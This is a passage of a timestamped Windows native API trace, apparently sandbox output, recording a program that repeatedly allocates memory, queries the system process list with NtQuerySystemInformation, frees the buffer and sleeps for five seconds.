ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.141] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.150] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.159] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.169] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.177] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.186] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.196] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.205] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.214] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.232] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.242] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.252] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.262] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.272] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.282] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.291] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.301] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.310] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.319] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, 